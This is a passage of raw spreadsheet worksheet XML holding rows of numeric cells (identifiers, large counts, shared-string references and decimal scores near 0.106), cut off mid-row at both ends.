        <v>12562</v>
      </c>
      <c r="D13058" s="2">
        <v>1.0</v>
      </c>
      <c r="E13058" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13058" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="13059" ht="15.75" customHeight="1">
      <c r="A13059" s="1">
        <v>8701.0</v>
      </c>
      <c r="B13059" s="2">
        <v>5.4433702E7</v>
      </c>
      <c r="C13059" s="2" t="s">
        <v>12563</v>
      </c>
      <c r="D13059" s="2">
        <v>1.0</v>
      </c>
      <c r="E13059" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13059" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="13060" ht="15.75" customHeight="1">
      <c r="A13060" s="1">
        <v>8972.0</v>
      </c>
      <c r="B13060" s="2">
        <v>5.4954966E7</v>
      </c>
      <c r="C13060" s="2" t="s">
        <v>12564</v>
      </c>
      <c r="D13060" s="2">
        <v>1.0</v>
      </c>
      <c r="E13060" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13060" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="13061" ht="15.75" customHeight="1">
      <c r="A13061" s="1">
        <v>13082.0</v>
      </c>
      <c r="B13061" s="2">
        <v>3.3358399E7</v>
      </c>
      <c r="C13061" s="2" t="s">
        <v>12565</v>
      </c>
      <c r="D13061" s="2">
        <v>1.0</v>
      </c>
      <c r="E13061" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13061" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="13062" ht="15.75" customHeight="1">
      <c r="A13062" s="1">
        <v>19850.0</v>
      </c>
      <c r="B13062" s="2">
        <v>5.711968E7</v>
      </c>
      <c r="C13062" s="2" t="s">
        <v>12566</v>
      </c>
      <c r="D13062" s="2">
        <v>1.0</v>
      </c>
      <c r="E13062" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13062" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="13063" ht="15.75" customHeight="1">
      <c r="A13063" s="1">
        <v>21023.0</v>
      </c>
      <c r="B13063" s="2">
        <v>1.7431454E7</v>
      </c>
      <c r="C13063" s="2" t="s">
        <v>12567</v>
      </c>
      <c r="D13063" s="2">
        <v>1.0</v>
      </c>
      <c r="E13063" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13063" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="13064" ht="15.75" customHeight="1">
      <c r="A13064" s="1">
        <v>4106.0</v>
      </c>
      <c r="B13064" s="2">
        <v>4.1334953E7</v>
      </c>
      <c r="C13064" s="2" t="s">
        <v>12568</v>
      </c>
      <c r="D13064" s="2">
        <v>1.0</v>
      </c>
      <c r="E13064" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13064" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="13065" ht="15.75" customHeight="1">
      <c r="A13065" s="1">
        <v>7240.0</v>
      </c>
      <c r="B13065" s="2">
        <v>5.0679234E7</v>
      </c>
      <c r="C13065" s="2" t="s">
        <v>12569</v>
      </c>
      <c r="D13065" s="2">
        <v>1.0</v>
      </c>
      <c r="E13065" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13065" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="13066" ht="15.75" customHeight="1">
      <c r="A13066" s="1">
        <v>7607.0</v>
      </c>
      <c r="B13066" s="2">
        <v>5.1652734E7</v>
      </c>
      <c r="C13066" s="2" t="s">
        <v>12570</v>
      </c>
      <c r="D13066" s="2">
        <v>1.0</v>
      </c>
      <c r="E13066" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13066" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="13067" ht="15.75" customHeight="1">
      <c r="A13067" s="1">
        <v>7803.0</v>
      </c>
      <c r="B13067" s="2">
        <v>5.2226612E7</v>
      </c>
      <c r="C13067" s="2" t="s">
        <v>12571</v>
      </c>
      <c r="D13067" s="2">
        <v>1.0</v>
      </c>
      <c r="E13067" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13067" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="13068" ht="15.75" customHeight="1">
      <c r="A13068" s="1">
        <v>8932.0</v>
      </c>
      <c r="B13068" s="2">
        <v>5.4852946E7</v>
      </c>
      <c r="C13068" s="2" t="s">
        <v>12572</v>
      </c>
      <c r="D13068" s="2">
        <v>1.0</v>
      </c>
      <c r="E13068" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13068" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="13069" ht="15.75" customHeight="1">
      <c r="A13069" s="1">
        <v>6965.0</v>
      </c>
      <c r="B13069" s="2">
        <v>4.998173E7</v>
      </c>
      <c r="C13069" s="2" t="s">
        <v>12573</v>
      </c>
      <c r="D13069" s="2">
        <v>1.0</v>
      </c>
      <c r="E13069" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13069" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="13070" ht="15.75" customHeight="1">
      <c r="A13070" s="1">
        <v>10870.0</v>
      </c>
      <c r="B13070" s="2">
        <v>1.6471201E7</v>
      </c>
      <c r="C13070" s="2" t="s">
        <v>12574</v>
      </c>
      <c r="D13070" s="2">
        <v>1.0</v>
      </c>
      <c r="E13070" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13070" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="13071" ht="15.75" customHeight="1">
      <c r="A13071" s="1">
        <v>29017.0</v>
      </c>
      <c r="B13071" s="2">
        <v>3.0085463E7</v>
      </c>
      <c r="C13071" s="2" t="s">
        <v>12575</v>
      </c>
      <c r="D13071" s="2">
        <v>1.0</v>
      </c>
      <c r="E13071" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13071" s="2">
        <v>0.1074561403508772</v>
      </c>
    </row>
    <row r="13072" ht="15.75" customHeight="1">
      <c r="A13072" s="1">
        <v>4790.0</v>
      </c>
      <c r="B13072" s="2">
        <v>4.3490633E7</v>
      </c>
      <c r="C13072" s="2" t="s">
        <v>12576</v>
      </c>
      <c r="D13072" s="2">
        <v>1.0</v>
      </c>
      <c r="E13072" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13072" s="2">
        <v>0.1071428571428571</v>
      </c>
    </row>
    <row r="13073" ht="15.75" customHeight="1">
      <c r="A13073" s="1">
        <v>34159.0</v>
      </c>
      <c r="B13073" s="2">
        <v>9889828.0</v>
      </c>
      <c r="C13073" s="2" t="s">
        <v>12577</v>
      </c>
      <c r="D13073" s="2">
        <v>1.0</v>
      </c>
      <c r="E13073" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13073" s="2">
        <v>0.1069651741293533</v>
      </c>
    </row>
    <row r="13074" ht="15.75" customHeight="1">
      <c r="A13074" s="1">
        <v>5818.0</v>
      </c>
      <c r="B13074" s="2">
        <v>4.6851618E7</v>
      </c>
      <c r="C13074" s="2" t="s">
        <v>12578</v>
      </c>
      <c r="D13074" s="2">
        <v>1.0</v>
      </c>
      <c r="E13074" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13074" s="2">
        <v>0.1067708333333333</v>
      </c>
    </row>
    <row r="13075" ht="15.75" customHeight="1">
      <c r="A13075" s="1">
        <v>6579.0</v>
      </c>
      <c r="B13075" s="2">
        <v>4.8917382E7</v>
      </c>
      <c r="C13075" s="2" t="s">
        <v>12579</v>
      </c>
      <c r="D13075" s="2">
        <v>1.0</v>
      </c>
      <c r="E13075" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13075" s="2">
        <v>0.1067019400352734</v>
      </c>
    </row>
    <row r="13076" ht="15.75" customHeight="1">
      <c r="A13076" s="1">
        <v>1650.0</v>
      </c>
      <c r="B13076" s="2">
        <v>2.8106708E7</v>
      </c>
      <c r="C13076" s="2" t="s">
        <v>12580</v>
      </c>
      <c r="D13076" s="2">
        <v>1.0</v>
      </c>
      <c r="E13076" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13076" s="2">
        <v>0.1066308243727599</v>
      </c>
    </row>
    <row r="13077" ht="15.75" customHeight="1">
      <c r="A13077" s="1">
        <v>18810.0</v>
      </c>
      <c r="B13077" s="2">
        <v>5.3890978E7</v>
      </c>
      <c r="C13077" s="2" t="s">
        <v>12581</v>
      </c>
      <c r="D13077" s="2">
        <v>1.0</v>
      </c>
      <c r="E13077" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13077" s="2">
        <v>0.1066308243727598</v>
      </c>
    </row>
    <row r="13078" ht="15.75" customHeight="1">
      <c r="A13078" s="1">
        <v>2278.0</v>
      </c>
      <c r="B13078" s="2">
        <v>3.2540384E7</v>
      </c>
      <c r="C13078" s="2" t="s">
        <v>12582</v>
      </c>
      <c r="D13078" s="2">
        <v>1.0</v>
      </c>
      <c r="E13078" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13078" s="2">
        <v>0.1065573770491803</v>
      </c>
    </row>
    <row r="13079" ht="15.75" customHeight="1">
      <c r="A13079" s="1">
        <v>12578.0</v>
      </c>
      <c r="B13079" s="2">
        <v>3.0011107E7</v>
      </c>
      <c r="C13079" s="2" t="s">
        <v>12583</v>
      </c>
      <c r="D13079" s="2">
        <v>1.0</v>
      </c>
      <c r="E13079" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13079" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="13080" ht="15.75" customHeight="1">
      <c r="A13080" s="1">
        <v>3456.0</v>
      </c>
      <c r="B13080" s="2">
        <v>3.828309E7</v>
      </c>
      <c r="C13080" s="2" t="s">
        <v>12584</v>
      </c>
      <c r="D13080" s="2">
        <v>1.0</v>
      </c>
      <c r="E13080" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13080" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="13081" ht="15.75" customHeight="1">
      <c r="A13081" s="1">
        <v>1909.0</v>
      </c>
      <c r="B13081" s="2">
        <v>3.0000498E7</v>
      </c>
      <c r="C13081" s="2" t="s">
        <v>12585</v>
      </c>
      <c r="D13081" s="2">
        <v>1.0</v>
      </c>
      <c r="E13081" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13081" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13082" ht="15.75" customHeight="1">
      <c r="A13082" s="1">
        <v>3286.0</v>
      </c>
      <c r="B13082" s="2">
        <v>3.7504586E7</v>
      </c>
      <c r="C13082" s="2" t="s">
        <v>12586</v>
      </c>
      <c r="D13082" s="2">
        <v>1.0</v>
      </c>
      <c r="E13082" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13082" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13083" ht="15.75" customHeight="1">
      <c r="A13083" s="1">
        <v>3468.0</v>
      </c>
      <c r="B13083" s="2">
        <v>3.8339304E7</v>
      </c>
      <c r="C13083" s="2" t="s">
        <v>12587</v>
      </c>
      <c r="D13083" s="2">
        <v>1.0</v>
      </c>
      <c r="E13083" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13083" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13084" ht="15.75" customHeight="1">
      <c r="A13084" s="1">
        <v>3503.0</v>
      </c>
      <c r="B13084" s="2">
        <v>3.8532669E7</v>
      </c>
      <c r="C13084" s="2" t="s">
        <v>12588</v>
      </c>
      <c r="D13084" s="2">
        <v>1.0</v>
      </c>
      <c r="E13084" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13084" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13085" ht="15.75" customHeight="1">
      <c r="A13085" s="1">
        <v>7566.0</v>
      </c>
      <c r="B13085" s="2">
        <v>5.1557866E7</v>
      </c>
      <c r="C13085" s="2" t="s">
        <v>12589</v>
      </c>
      <c r="D13085" s="2">
        <v>1.0</v>
      </c>
      <c r="E13085" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13085" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13086" ht="15.75" customHeight="1">
      <c r="A13086" s="1">
        <v>8368.0</v>
      </c>
      <c r="B13086" s="2">
        <v>5.3799142E7</v>
      </c>
      <c r="C13086" s="2" t="s">
        <v>12590</v>
      </c>
      <c r="D13086" s="2">
        <v>1.0</v>
      </c>
      <c r="E13086" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13086" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13087" ht="15.75" customHeight="1">
      <c r="A13087" s="1">
        <v>8415.0</v>
      </c>
      <c r="B13087" s="2">
        <v>5.3917358E7</v>
      </c>
      <c r="C13087" s="2" t="s">
        <v>12591</v>
      </c>
      <c r="D13087" s="2">
        <v>1.0</v>
      </c>
      <c r="E13087" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13087" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13088" ht="15.75" customHeight="1">
      <c r="A13088" s="1">
        <v>10253.0</v>
      </c>
      <c r="B13088" s="2">
        <v>5.7554632E7</v>
      </c>
      <c r="C13088" s="2" t="s">
        <v>12592</v>
      </c>
      <c r="D13088" s="2">
        <v>1.0</v>
      </c>
      <c r="E13088" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13088" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13089" ht="15.75" customHeight="1">
      <c r="A13089" s="1">
        <v>10825.0</v>
      </c>
      <c r="B13089" s="2">
        <v>1.5929544E7</v>
      </c>
      <c r="C13089" s="2" t="s">
        <v>12593</v>
      </c>
      <c r="D13089" s="2">
        <v>1.0</v>
      </c>
      <c r="E13089" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13089" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13090" ht="15.75" customHeight="1">
      <c r="A13090" s="1">
        <v>13596.0</v>
      </c>
      <c r="B13090" s="2">
        <v>3.5783123E7</v>
      </c>
      <c r="C13090" s="5" t="s">
        <v>12594</v>
      </c>
      <c r="D13090" s="2">
        <v>1.0</v>
      </c>
      <c r="E13090" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13090" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13091" ht="15.75" customHeight="1">
      <c r="A13091" s="1">
        <v>15355.0</v>
      </c>
      <c r="B13091" s="2">
        <v>4.2687492E7</v>
      </c>
      <c r="C13091" s="2" t="s">
        <v>12595</v>
      </c>
      <c r="D13091" s="2">
        <v>1.0</v>
      </c>
      <c r="E13091" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13091" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13092" ht="15.75" customHeight="1">
      <c r="A13092" s="1">
        <v>15989.0</v>
      </c>
      <c r="B13092" s="2">
        <v>4.4926965E7</v>
      </c>
      <c r="C13092" s="2" t="s">
        <v>12596</v>
      </c>
      <c r="D13092" s="2">
        <v>1.0</v>
      </c>
      <c r="E13092" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13092" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13093" ht="15.75" customHeight="1">
      <c r="A13093" s="1">
        <v>16963.0</v>
      </c>
      <c r="B13093" s="2">
        <v>4.8257385E7</v>
      </c>
      <c r="C13093" s="2" t="s">
        <v>12597</v>
      </c>
      <c r="D13093" s="2">
        <v>1.0</v>
      </c>
      <c r="E13093" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13093" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13094" ht="15.75" customHeight="1">
      <c r="A13094" s="1">
        <v>17314.0</v>
      </c>
      <c r="B13094" s="2">
        <v>4.9328069E7</v>
      </c>
      <c r="C13094" s="2" t="s">
        <v>12598</v>
      </c>
      <c r="D13094" s="2">
        <v>1.0</v>
      </c>
      <c r="E13094" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13094" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13095" ht="15.75" customHeight="1">
      <c r="A13095" s="1">
        <v>17385.0</v>
      </c>
      <c r="B13095" s="2">
        <v>4.9571342E7</v>
      </c>
      <c r="C13095" s="2" t="s">
        <v>12599</v>
      </c>
      <c r="D13095" s="2">
        <v>1.0</v>
      </c>
      <c r="E13095" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13095" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13096" ht="15.75" customHeight="1">
      <c r="A13096" s="1">
        <v>17591.0</v>
      </c>
      <c r="B13096" s="2">
        <v>5.029332E7</v>
      </c>
      <c r="C13096" s="2" t="s">
        <v>12600</v>
      </c>
      <c r="D13096" s="2">
        <v>1.0</v>
      </c>
      <c r="E13096" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13096" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13097" ht="15.75" customHeight="1">
      <c r="A13097" s="1">
        <v>18098.0</v>
      </c>
      <c r="B13097" s="2">
        <v>5.1701427E7</v>
      </c>
      <c r="C13097" s="2" t="s">
        <v>12601</v>
      </c>
      <c r="D13097" s="2">
        <v>1.0</v>
      </c>
      <c r="E13097" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13097" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13098" ht="15.75" customHeight="1">
      <c r="A13098" s="1">
        <v>22171.0</v>
      </c>
      <c r="B13098" s="2">
        <v>3.1613168E7</v>
      </c>
      <c r="C13098" s="2" t="s">
        <v>12602</v>
      </c>
      <c r="D13098" s="2">
        <v>1.0</v>
      </c>
      <c r="E13098" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13098" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13099" ht="15.75" customHeight="1">
      <c r="A13099" s="1">
        <v>25118.0</v>
      </c>
      <c r="B13099" s="2">
        <v>1.2972286E7</v>
      </c>
      <c r="C13099" s="2" t="s">
        <v>12470</v>
      </c>
      <c r="D13099" s="2">
        <v>1.0</v>
      </c>
      <c r="E13099" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13099" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13100" ht="15.75" customHeight="1">
      <c r="A13100" s="1">
        <v>27978.0</v>
      </c>
      <c r="B13100" s="2">
        <v>2.401798E7</v>
      </c>
      <c r="C13100" s="2" t="s">
        <v>12603</v>
      </c>
      <c r="D13100" s="2">
        <v>1.0</v>
      </c>
      <c r="E13100" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13100" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13101" ht="15.75" customHeight="1">
      <c r="A13101" s="1">
        <v>28159.0</v>
      </c>
      <c r="B13101" s="2">
        <v>2.4899338E7</v>
      </c>
      <c r="C13101" s="2" t="s">
        <v>12604</v>
      </c>
      <c r="D13101" s="2">
        <v>1.0</v>
      </c>
      <c r="E13101" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13101" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13102" ht="15.75" customHeight="1">
      <c r="A13102" s="1">
        <v>29438.0</v>
      </c>
      <c r="B13102" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C13102" s="2" t="s">
        <v>12605</v>
      </c>
      <c r="D13102" s="2">
        <v>1.0</v>
      </c>
      <c r="E13102" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13102" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13103" ht="15.75" customHeight="1">
      <c r="A13103" s="1">
        <v>29507.0</v>
      </c>
      <c r="B13103" s="2">
        <v>3.2740111E7</v>
      </c>
      <c r="C13103" s="2" t="s">
        <v>12606</v>
      </c>
      <c r="D13103" s="2">
        <v>1.0</v>
      </c>
      <c r="E13103" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13103" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13104" ht="15.75" customHeight="1">
      <c r="A13104" s="1">
        <v>29561.0</v>
      </c>
      <c r="B13104" s="2">
        <v>3.316521E7</v>
      </c>
      <c r="C13104" s="2" t="s">
        <v>12607</v>
      </c>
      <c r="D13104" s="2">
        <v>1.0</v>
      </c>
      <c r="E13104" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13104" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13105" ht="15.75" customHeight="1">
      <c r="A13105" s="1">
        <v>29616.0</v>
      </c>
      <c r="B13105" s="2">
        <v>3.3630015E7</v>
      </c>
      <c r="C13105" s="2" t="s">
        <v>12608</v>
      </c>
      <c r="D13105" s="2">
        <v>1.0</v>
      </c>
      <c r="E13105" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13105" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13106" ht="15.75" customHeight="1">
      <c r="A13106" s="1">
        <v>30495.0</v>
      </c>
      <c r="B13106" s="2">
        <v>3994740.0</v>
      </c>
      <c r="C13106" s="2" t="s">
        <v>12609</v>
      </c>
      <c r="D13106" s="2">
        <v>1.0</v>
      </c>
      <c r="E13106" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13106" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13107" ht="15.75" customHeight="1">
      <c r="A13107" s="1">
        <v>32571.0</v>
      </c>
      <c r="B13107" s="2">
        <v>5769097.0</v>
      </c>
      <c r="C13107" s="2" t="s">
        <v>12610</v>
      </c>
      <c r="D13107" s="2">
        <v>1.0</v>
      </c>
      <c r="E13107" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13107" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13108" ht="15.75" customHeight="1">
      <c r="A13108" s="1">
        <v>33211.0</v>
      </c>
      <c r="B13108" s="2">
        <v>7206083.0</v>
      </c>
      <c r="C13108" s="2" t="s">
        <v>12611</v>
      </c>
      <c r="D13108" s="2">
        <v>1.0</v>
      </c>
      <c r="E13108" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13108" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13109" ht="15.75" customHeight="1">
      <c r="A13109" s="1">
        <v>33495.0</v>
      </c>
      <c r="B13109" s="2">
        <v>8003185.0</v>
      </c>
      <c r="C13109" s="2" t="s">
        <v>12612</v>
      </c>
      <c r="D13109" s="2">
        <v>1.0</v>
      </c>
      <c r="E13109" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13109" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13110" ht="15.75" customHeight="1">
      <c r="A13110" s="1">
        <v>33513.0</v>
      </c>
      <c r="B13110" s="2">
        <v>8080533.0</v>
      </c>
      <c r="C13110" s="2" t="s">
        <v>12613</v>
      </c>
      <c r="D13110" s="2">
        <v>1.0</v>
      </c>
      <c r="E13110" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13110" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="13111" ht="15.75" customHeight="1">
      <c r="A13111" s="1">
        <v>4293.0</v>
      </c>
      <c r="B13111" s="2">
        <v>4.1913451E7</v>
      </c>
      <c r="C13111" s="2" t="s">
        <v>12614</v>
      </c>
      <c r="D13111" s="2">
        <v>1.0</v>
      </c>
      <c r="E13111" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13111" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="13112" ht="15.75" customHeight="1">
      <c r="A13112" s="1">
        <v>5753.0</v>
      </c>
      <c r="B13112" s="2">
        <v>4.6666445E7</v>
      </c>
      <c r="C13112" s="2" t="s">
        <v>12614</v>
      </c>
      <c r="D13112" s="2">
        <v>1.0</v>
      </c>
      <c r="E13112" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13112" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="13113" ht="15.75" customHeight="1">
      <c r="A13113" s="1">
        <v>7909.0</v>
      </c>
      <c r="B13113" s="2">
        <v>5.2493017E7</v>
      </c>
      <c r="C13113" s="2" t="s">
        <v>12615</v>
      </c>
      <c r="D13113" s="2">
        <v>1.0</v>
      </c>
      <c r="E13113" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13113" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="13114" ht="15.75" customHeight="1">
      <c r="A13114" s="1">
        <v>9893.0</v>
      </c>
      <c r="B13114" s="2">
        <v>5.6767811E7</v>
      </c>
      <c r="C13114" s="2" t="s">
        <v>12616</v>
      </c>
      <c r="D13114" s="2">
        <v>1.0</v>
      </c>
      <c r="E13114" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13114" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="13115" ht="15.75" customHeight="1">
      <c r="A13115" s="1">
        <v>13256.0</v>
      </c>
      <c r="B13115" s="2">
        <v>3.4299497E7</v>
      </c>
      <c r="C13115" s="2" t="s">
        <v>12617</v>
      </c>
      <c r="D13115" s="2">
        <v>1.0</v>
      </c>
      <c r="E13115" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13115" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="13116" ht="15.75" customHeight="1">
      <c r="A13116" s="1">
        <v>15182.0</v>
      </c>
      <c r="B13116" s="2">
        <v>4.2025368E7</v>
      </c>
      <c r="C13116" s="2" t="s">
        <v>12618</v>
      </c>
      <c r="D13116" s="2">
        <v>1.0</v>
      </c>
      <c r="E13116" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13116" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="13117" ht="15.75" customHeight="1">
      <c r="A13117" s="1">
        <v>17910.0</v>
      </c>
      <c r="B13117" s="2">
        <v>5.1116718E7</v>
      </c>
      <c r="C13117" s="2" t="s">
        <v>12619</v>
      </c>
      <c r="D13117" s="2">
        <v>1.0</v>
      </c>
      <c r="E13117" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13117" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="13118" ht="15.75" customHeight="1">
      <c r="A13118" s="1">
        <v>19416.0</v>
      </c>
      <c r="B13118" s="2">
        <v>5.5630506E7</v>
      </c>
      <c r="C13118" s="2" t="s">
        <v>12620</v>
      </c>
      <c r="D13118" s="2">
        <v>1.0</v>
      </c>
      <c r="E13118" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13118" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="13119" ht="15.75" customHeight="1">
      <c r="A13119" s="1">
        <v>25296.0</v>
      </c>
      <c r="B13119" s="2">
        <v>1.3410364E7</v>
      </c>
      <c r="C13119" s="2" t="s">
        <v>12621</v>
      </c>
      <c r="D13119" s="2">
        <v>1.0</v>
      </c>
      <c r="E13119" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13119" s="2">
        <v>0.1063218390804597</v>
      </c>
    </row>
    <row r="13120" ht="15.75" customHeight="1">
      <c r="A13120" s="1">
        <v>7237.0</v>
      </c>
      <c r="B13120" s="2">
        <v>5.0679234E7</v>
      </c>
      <c r="C13120" s="2" t="s">
        <v>12481</v>
      </c>
      <c r="D13120" s="2">
        <v>1.0</v>
      </c>
      <c r="E13120" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13120" s="2">
        <v>0.1062378167641326</v>
      </c>
    </row>
    <row r="13121" ht="15.75" customHeight="1">
      <c r="A13121" s="1">
        <v>3572.0</v>
      </c>
      <c r="B13121" s="2">
        <v>3.8949338E7</v>
      </c>
      <c r="C13121" s="2" t="s">
        <v>12622</v>
      </c>
      <c r="D13121" s="2">
        <v>1.0</v>
      </c>
      <c r="E13121" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13121" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="13122" ht="15.75" customHeight="1">
      <c r="A13122" s="1">
        <v>4538.0</v>
      </c>
      <c r="B13122" s="2">
        <v>4.2659056E7</v>
      </c>
      <c r="C13122" s="2" t="s">
        <v>12623</v>
      </c>
      <c r="D13122" s="2">
        <v>1.0</v>
      </c>
      <c r="E13122" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13122" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="13123" ht="15.75" customHeight="1">
      <c r="A13123" s="1">
        <v>5570.0</v>
      </c>
      <c r="B13123" s="2">
        <v>4.6023842E7</v>
      </c>
      <c r="C13123" s="2" t="s">
        <v>12624</v>
      </c>
      <c r="D13123" s="2">
        <v>1.0</v>
      </c>
      <c r="E13123" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13123" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="13124" ht="15.75" customHeight="1">
      <c r="A13124" s="1">
        <v>17756.0</v>
      </c>
      <c r="B13124" s="2">
        <v>5.071135E7</v>
      </c>
      <c r="C13124" s="2" t="s">
        <v>12625</v>
      </c>
      <c r="D13124" s="2">
        <v>1.0</v>
      </c>
      <c r="E13124" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13124" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="13125" ht="15.75" customHeight="1">
      <c r="A13125" s="1">
        <v>18874.0</v>
      </c>
      <c r="B13125" s="2">
        <v>5.4063717E7</v>
      </c>
      <c r="C13125" s="2" t="s">
        <v>12626</v>
